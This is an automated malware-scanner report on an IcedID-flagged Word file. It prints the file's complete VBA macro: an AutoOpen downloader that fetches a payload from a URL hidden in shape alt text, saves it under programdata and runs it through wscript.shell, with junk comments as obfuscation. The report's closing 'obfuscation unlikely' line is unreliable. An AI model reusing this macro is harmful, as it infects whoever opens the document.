Verdict: MALICIOUS
Risk score: 230

Heuristics (6)

- ClamAV: Doc.Macro.ICEID1020-9781212-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): Document contains a VBA project — VBA macros present
- CreateObject call (high, OLE_VBA_CREATEOBJ): matched line in script: `Set xapeb = CreateObject("Script" + SFocJ)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): matched line in script: `Sub AutoOpen()`
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas: in document text (OOXML body / shared strings). The other 27 extracted URLs are likewise all OOXML schema namespace URIs on schemas.microsoft.com or schemas.openxmlformats.org, each labelled "In document text (OOXML body / shared strings)"; none of them is referenced from the macro code.
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12225 bytes | 38a9ddb32cc184f0addea6aae3c3922c8cfbdc75411eba7b812d41fa5141eba8 |

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "qKlAh"
Sub Pwibp(VKjGS, Optional ByVal WajAN As String = "c:\programdata\CCbhU.txt", Optional ByVal SFocJ As String = "ing.FileSystemObject")
' Rector derivable innermost mutants
' Sprouts wholly
' Requiring exasperate
' Venereal shorewards
' Accelerated categories polling
' Scalp prolonged
' Vice diversities homelands endogenous moated
' Pourable community metabolism acid roundels surround
' Medication soso
' Crossexamination
' Tarnish smokiest
' Clearway vulnerabilities thronged
' Disposer shiniest forbear
' Mendel profuseness
Set xapeb = CreateObject("Script" + SFocJ)
' Gloriously correction scruples bacon
' Symbolical intend fenced resumption tramlines
' Outbuildings thugs integers impishness
' Valuing dungbeetle heighten throats inscriptions
' Pupated conflictual skidding nodal privates
' Whippet phrases investors defies
Set VdDdP = xapeb.CreateTextFile(WajAN)
' Chafes elongated scalp robins
' Defaulters collier
' Verdure
' Tiller marchioness neighbourhood hussies
VdDdP.WriteLine VKjGS
' Nattering swearer
' Inventory stick unaffectedly edgewise inefficiencies unclouded
' Freestanding quadrangles phylogenetic
' Dispute
' Soundless
' Rampages ravaging regrettably punitive
VdDdP.Close
' Lowly illiquid candidature purists fishhook retiring
' Choker ponies hull hating
' Subsiding begat deepfried smallmindedness
' Dashed lamplighter mission
' Relate waifs domain
' Ginseng associativity
' Decant whom shelved ignorantly
' Slice groaned
' Questionings
' Supercharged
' Freshens
' Hesitates
' Beets soak
' Miscellany earthwork demystify contain
' Unreal
' Quaggas irrelevance ordinariness
' Monocled semantic demolished depressive smalltalk
' Chamber accepts indulgent
' Porns okapi fought incomparably snuffed
' Occurred carrion friendliest fostered
' Robberies intended darter imprecisely amnesic
' Emissions lathe
' Redrafted motioning grapevine uncertainly discretely
' Certainties arranged benjamin dispiriting literacy ionise
' Effrontery monopolistic embarks futurism economies said
' Administer snakes demilitarisation
' Plush tuner boardings notable conifer stormier
' Massacre barged insecticidal rubric
' Solaces corneal repertory
' Hydroponically stoppered hauled ventilated
' Pocketing realms bushland
' Pavements dispiritedly repents
' Mores polyester cesspool defensive liquefaction heroical
' Nightclothes misspelling
' Deciduous spayed goldfish
' Fundholders sniffs exonerates wakened
' Choirmaster touristic judicature
End Sub
' Spurts frontier mumblings seclusion
' Interatomic interplay musicologists thorough player
' Involution impaired fairest excused duels
' Molecular protectorates beefs
' Above starting braise outcome
Sub AutoOpen()
' Naturist deans solfa chromosomes variegated emaciate
' Geese gobbled fad welt
' Compensated holler topologies
' Denigration frankincense crystallography
' Concubine interminable normandy relinquished fearsomely
' Relabelled arcadia clippers
' Naiads phrasebook
' Sables decorative
' Interferences caustics gypsies
' Bondage thrives penalise posted conspicuously
' Biggest humours planets insinuatingly
' Bum detains superior aviator
' Contiguously hexed
' Cessations intertidal
' Cormorant kriegspiel minuscule
' Improvises
' Hydrologists sanely emplacements
' Bergs finalist affinity
' Protestors docked anniversary ushered
' Telesales fertilisers
' Nincompoop circumventions irrationality pluralising flirted
' Headnote metaphysics corroding
' Venose louver
' Ministry psycholinguists
' Moaners butlers
' Mobster ruction
' Inclined conformists downwards allure
Dim qfHdc As New iekTC
' Raced cocaine reproaches
' Pranksters geoscientific deviously
' Collection clump restrictive
' Straps straying detrimental
' Feverish formalise alloyed
' Flubbed ostlers antiquary
VKjGS = qfHdc.qyItw("MSXML2.serverXMLHTTP")
' Inclinations wharves breathlessly
' Unionists immobilises
' Gunsmiths xhosa receivership
' Broking prays hint
' Asymmetry
Pwibp oHFrs(VKjGS)
' Trusty despatch regina
' Rockets dimension
' Reborn deflatable
' Secretly
' Frightening shareholding greys
' Extendable unnoted beards run
' Amplify breeders cheered lowest mater
' Impressive outposts wriggles
' Moors secede nips secretly tiro
' Cushioning punishing
' Deuces conundrums
' Scarify papa catguts
' Strangulation escapes unregenerate
TSAAx ICfFi(0) + "vr32 c:\programdata\CCbhU.txt", "ws"
End Sub
Function OSvvN(BRlFd, VvSOM)
' Conservations brightest
' Clappers unwinding collectables dermis
' Laughably functionalist discussable ambushing fad
' Flushes epitaph kleptomania scrawled
' Nutmegs adverted tincan colourings
OSvvN = Split(BRlFd, VvSOM)
End Function
Attribute VB_Name = "Ozgaj"
' Marshalled reappointment
' Sating culinary kiddie
' Glutinous byways blender breach judas
' Hydrazine candidatures laity
Function oHFrs(iVxSg)
' Limber boomerangs retaking
' Reverberations streets craggy proves segregates
' Radiography destined resistive hectically
' Perplexities abjure derivable sandbanks
' Alliteration blackness protestations foregoing clinches
' Temporally
' Casual path evidences
' Comparable revere retraining
oHFrs = StrConv(iVxSg, vbUnicode)
' Exogenous
' Undid hawker
' Debunks saleable auspicious
' Protegees protectionist townscape
' Sponginess eyewash
' Nestable contemplation school coupler
End Function
' Cheesy allowable franchisee outdated
' Therapies conscript dog keystroke uncorrectable
' Preachers charioteer closeness gaggle wellmannered magical cyclones
' Unrecognised beautifies
' Suggested libretto lithe procrastinators pacifier bolivia guardroom alder
Function QanMi()
' Shirts racier knob
' Tars resits chins
' Trice dado bop
' Toilet zero pipeline pensiveness
' Kiosks cone coffin
' Implies
' Soothed unfurnished sublimation admiring
' Iconographical gainsaying
' Diagram
' Presidency scatological outlets
' Amps malarial benefit bodywork
With ActiveDocument.shapes(1)
QanMi = .AlternativeText
End With
End Function
' Unworn paraquat seacow wasteland
' Characters sadism elicit citizenry mouthpieces
' Burners absorbency reading narrated sainthood
' Wearing easels typical gender newness
' Sternest
Function ICfFi(PzDPu)
' Aright foliated agitated unselfconscious accelerating
' Suicidal impending
' Windbag
' Verona taxis middlesized conakry
' Blueberry persian warps
' Euphemistically polarising averaging celebratory alerts
' Spiritualism receptive intuited
' Fracas
' Reassigning cloakroom rickety ligaments profanity scissor
pYuqx = QanMi()
QDmib = OSvvN(pYuqx, "###")
rWnQw = QDmib(PzDPu)
ICfFi = rWnQw
End Function
Attribute VB_Name = "iekTC"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
Dim i As Integer
Dim StrNew As String
Dim strOld As String
strOld = Trim(Text)
For i = 1 To Len(strOld)
StrNew = Mid(strOld, i, 1) & StrNew
Next i
Reverse = StrNew
End Function
' Wheeze
' Numbly distributing shamelessness quiets initialises
' Declination toxins pluto
' Adumbrated weird tony competently nightwear
' Prepays representation recompute bounces
' Monkfish emotionality lethally multimillion
Function qyItw(HAycs)
' Aldehyde breadfruit collapsed
' Reactors acrobats bilabial
' Twinkled priests peacemakers midafternoon antiquarians
' Pianissimo
' Wallchart implicating
' Binomial hooted animators
' Bong singularity
' Miscounting tunisian
Dim CfTyi As Object
' Impale guardhouse slice biped stagnancy
' Unpredicted wheedle corroborate
' Gaoled inconsiderately unlisted
' Takeover refrigerate southernmost bitterness moorland vivified redhead
' Siblings catechisms toast
' Integer tenant predecessors lieu recipients bantering
' Zestfully spooling burp improvidence
' Internalise
' Distinguish
' Cogency
' Authorisations xhosa urgency
' Threatening concentrated foghorn ingenious
' Psychoanalytic fullblooded abolitionists
' Attribution postponement papaws
Set CfTyi = CreateObject(HAycs)
' Codices audio muzzles whelp undivided
' Syntax apparatuses politic ibex
' Immunologist chipmunk
' Flanked apropos
' Peals dungarees skews drunkards constraining
' Resurgent pungency electrically coppice fieldwork
' Opportunistic booting stalemates
' Clown cobwebby recommences outbreaks dice
' Powersharing
' Eked expeditious inexcusably releases
' Trawls domineered renovated
' Simulate sects copses porthole deceived
' James flexor hymens officiated
' Hilarity unquote earthworms rest
' Chaplain songwriter zithers exclamations
' Hoists peninsular dropouts cheats ponderous cravenly
' Uruguay extrapolations attainable primarily
' Oracle envisioned
' Remediable bides replicable
' Stepfather detesting befitting
' Excommunication smother
' Fontanel abnormalities
' Thespian knocks
' Forwarding operand outrank peacock
cdcRr = ICfFi(1)
' Bequests
' Revamped gormless curse harpoon draping unquestioning
' Buffeted
' Bolsters
' Venues gymnasts airraid sorrier flute gadfly unethical
CfTyi.Open "GET", Reverse(cdcRr), False
' Protrusion dons hailstorm billets sixfold
' Troikas fissures adventuring permeate
' Misshapen smelter waggery
' Fibber
' Accountancy
CfTyi.Send
' Church interrelationships regeneration backchat reigning
' Sunbed pantheon simulate simulate display
' Dirties indoctrinates salamanders matured gleaned
' Bookshops wooed befuddle
' Garter hireling midst
qyItw = CfTyi.responsebody
End Function
Attribute VB_Name = "nkmqO"
Sub TSAAx(ZGDzM, oDrTi)
' Pantographs
' Honeycombed alighted beaker
' Endowment boy fixings thrushes bosnia
' Changeovers spats rendering eludes repaying
' Fiat
' Blurs rejuvenations infallibly infancy
' Emigrant quartzite
Set OkIJM = CreateObject(oDrTi + "cript.shell")
' Watchfully wrongly repose sociability gel
' Infirmities reporter secretions theoreticians eisteddfod
' Awaits disassociated
' Amass seasoned
' Backpedalling pathogenesis ivories rivalling
' Trample
' Tensile becoming romance baronesses plantain
' Hobgoblins careerism horsey frisking kebabs
' Unnoticeable
' Baldness cypress
' Contemptuous benefits
' Parodies spliced derivative
' Eddy falter scriptorium
' Halftruth amalgamation lashes maldives protozoan
' Consecrating westernisation compassionately smoothtongued backing
' Prestidigitatorial homemade touchy
' Numismatics manifold ripped turtleneck
' Molesting meiotic
' Motliest parses
' Pits diagram blabbed hysterectomy
' Aloneness
' Contrivances obliterate ruinous command judicature
' Metamorphic cleanse fiord soapbox
' Impermanence chariot
' Components
' Digit bookseller decilitre railway
' Smother liveliest
' Unthinkably perinatal
' Deteriorates
' Redder
' Mounds croup unmanageably
' Smalltown outhouse speaks swampier resounded
' Tyrannous outstations jaguars unwontedly impersonator
' Tin limekiln vibrantly
' Occurring billboards identifying councils
' Dentist yummy inebriation tattooing purist
' Headwind revenge devalues tahr diagnostic syllogisms childishness
' Fluid deltoid staple
' Charms detested complexities characteristically christenings
' Drowns extortionists deliverance
' Clinic dermic foodstuff wiggler
' Illadvised coder reprimanding
' Reflectivity undermanned
' Tipping intransigent landlady
' Posted excavated gustier accusals lumbered opprobrious
' Indexer patents gumboil coin
' Bibliographies
OkIJM.exec ZGDzM
' Scoot powerboat belittling
' Lateness culls cursive consented
' Choruses irresponsible
' Beermats
' Impassively inject mystifies
' Massaging
' Coffins enthusiasm
End Sub

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 45056 bytes | 0f871f666b329e4c0dc7a1dc40e40dd77be5334d3c5bcb7cc0df8db3f973b639 |

Detection

- ClamAV: Doc.Macro.ICEID1020-9781212-0
- Obfuscation or payload: unlikely